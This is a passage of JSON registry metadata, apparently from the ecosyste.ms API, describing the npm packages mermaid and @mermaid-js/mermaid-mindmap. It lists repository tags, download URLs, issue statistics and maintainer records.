nifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2024-09-08T21:27:09.971Z","dependent_packages_count":13,"downloads":188978,"downloads_period":"last-month","dependent_repos_count":56,"rankings":{"downloads":1.392339379048776,"dependent_repos_count":1.8555370791969683,"dependent_packages_count":2.684771837787731,"stargazers_count":0.0879970132963116,"forks_count":0.48645251300974335,"docker_downloads_count":1.641515789954494,"average":1.3581022687156707},"purl":"pkg:npm/%40mermaid-js/mermaid-mindmap","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@mermaid-js/mermaid-mindmap","docker_dependents_count":2,"docker_downloads_count":757,"usage_url":"https://repos.ecosyste.ms/usage/npm/@mermaid-js/mermaid-mindmap","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@mermaid-js/mermaid-mindmap/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2024-09-08T14:10:35.958Z","issues_count":1495,"pull_requests_count":1015,"avg_time_to_close_issue":36729669.49814815,"avg_time_to_close_pull_request":1429864.564164649,"issues_closed_count":535,"pull_requests_closed_count":824,"pull_request_authors_count":217,"issue_authors_count":824,"avg_comments_per_issue":4.57123745819398,"avg_comments_per_pull_request":3.643349753694581,"merged_pull_requests_count":714,"bot_issues_count":1,"bot_pull_requests_count":135,"past_year_issues_count":486,"past_year_pull_requests_count":567,"past_year_avg_time_to_close_issue":2115030.5104895104,"past_year_avg_time_to_close_pull_request":1070462.5711206896,"past_year_issues_closed_count":142,"past_year_pull_requests_closed_count":463,"past_year_pull_request_authors_count":166,"past_year_issue_authors_count":344,"past_year_avg_comments_per_issue":1.382716049382716,"past_year_avg_comments_per_pull_request":3.5220458553791887,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":112,"past_year_merged_pull_requests_count":385,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":355,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":53,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"Yokozuna59","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"aloisklink","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yash-Singh1","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"GDFaber","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"NicolasNewman","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"ashishjain0512","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"},{"login":"yari-dewalt","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"}],"active_maintainers":[{"login":"sidharthv96","count":101,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yash-Singh1","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"Yokozuna59","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"NicolasNewman","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"ashishjain0512","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Fmermaid-mindmap/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Fmermaid-mindmap/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Fmermaid-mindmap/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Fmermaid-mindmap/related_packages","maintainers":[{"uuid":"sidv","login":"sidv","name":null,"email":"npmjs@sidharth.dev","url":null,"packages_count":20,"html_url":"https://www.npmjs.com/~sidv","role":null,"created_at":"2022-11-07T19:14:09.891Z","updated_at":"2022-11-07T19:14:09.891Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/sidv/packages"},{"uuid":"knsv","login":"knsv","name":null,"email":"knsv@sveido.com","url":null,"packages_count":13,"html_url":"https://www.npmjs.com/~knsv","role":null,"created_at":"2022-11-07T19:14:09.901Z","updated_at":"2022-11-07T19:14:09.901Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/knsv/packages"},{"uuid":"ugnikalnis","login":"ugnikalnis","name":null,"email":"mindaugas.laganeckas@gmail.com","url":null,"packages_count":10,"html_url":"https://www.npmjs.com/~ugnikalnis","role":null,"created_at":"2022-11-07T19:14:09.909Z","updated_at":"2022-11-07T19:14:09.909Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ugnikalnis/packages"},{"uuid":"ashishjain0512","login":"ashishjain0512","name":null,"email":"ashishjain0512@gmail.com","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~ashishjain0512","role":null,"created_at":"2022-11-07T19:14:09.920Z","updated_at":"2022-11-07T19:14:09.920Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ashishjain0512/packages"},{"uuid":"p_brolin47","login":"p_brolin47","name":null,"email":"per@mermaidchart.com","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~p_brolin47","role":null,"created_at":"2022-11-08T21:31:00.327Z","updated_at":"2022-11-08T21:31:00.327Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/p_brolin47/packages"},{"uuid":"aloisklink","login":"aloisklink","name":null,"email":"alois@aloisklink.com","url":null,"packages_count":15,"html_url":"https://www.npmjs.com/~aloisklink","role":null,"created_at":"2023-12-13T16:36:26.230Z","updated_at":"2023-12-13T16:36:26.230Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/aloisklink/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":2006154,"name":"mermaid","ecosystem":"npm","description":"Markdown-ish syntax for generating flowcharts, mindmaps, sequence diagrams, class diagrams, gantt charts, git graphs and more.","homepage":"https://github.com/mermaid-js/mermaid#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","flowchart","sequence diagram","gantt","class diagram","git graph","mindmap","packet diagram","c4 diagram","er diagram","pie chart","pie diagram","quadrant chart","requirement diagram","graph"],"namespace":null,"versions_count":243,"first_release_published_at":"2014-12-02T17:39:42.546Z","latest_release_published_at":"2025-08-19T08:05:06.863Z","latest_release_number":"11.10.0","last_synced_at":"2025-08-19T08:06:30.133Z","created_at":"2022-04-09T19:30:31.837Z","updated_at":"2025-09-05T01:08:55.613Z","registry_url":"https://www.npmjs.com/package/mermaid","install_command":"npm install mermaid","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"next":"10.9.0-rc.2","alpha":"11.0.0-alpha.7","backport":"10.9.3","latest":"11.10.0"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2024-04-13T18:33:07.000Z","size":230370,"stargazers_count":66655,"open_issues_count":923,"forks_count":5722,"subscribers_count":632,"default_branch":"develop","last_synced_at":"2024-04-13T21:00:44.868Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2024-04-15T07:05:02.865Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":5515,"total_committers":513,"mean_commits":"10.750487329434698","dds":0.8814143245693563,"last_synced_commit":"56ec1ab52ce15ca7dbe76a3acbe1cb68acb13b2d"},"previous_names":["knsv/mermaid"],"tags_count":137,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":217856495,"owners_count":16241476,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-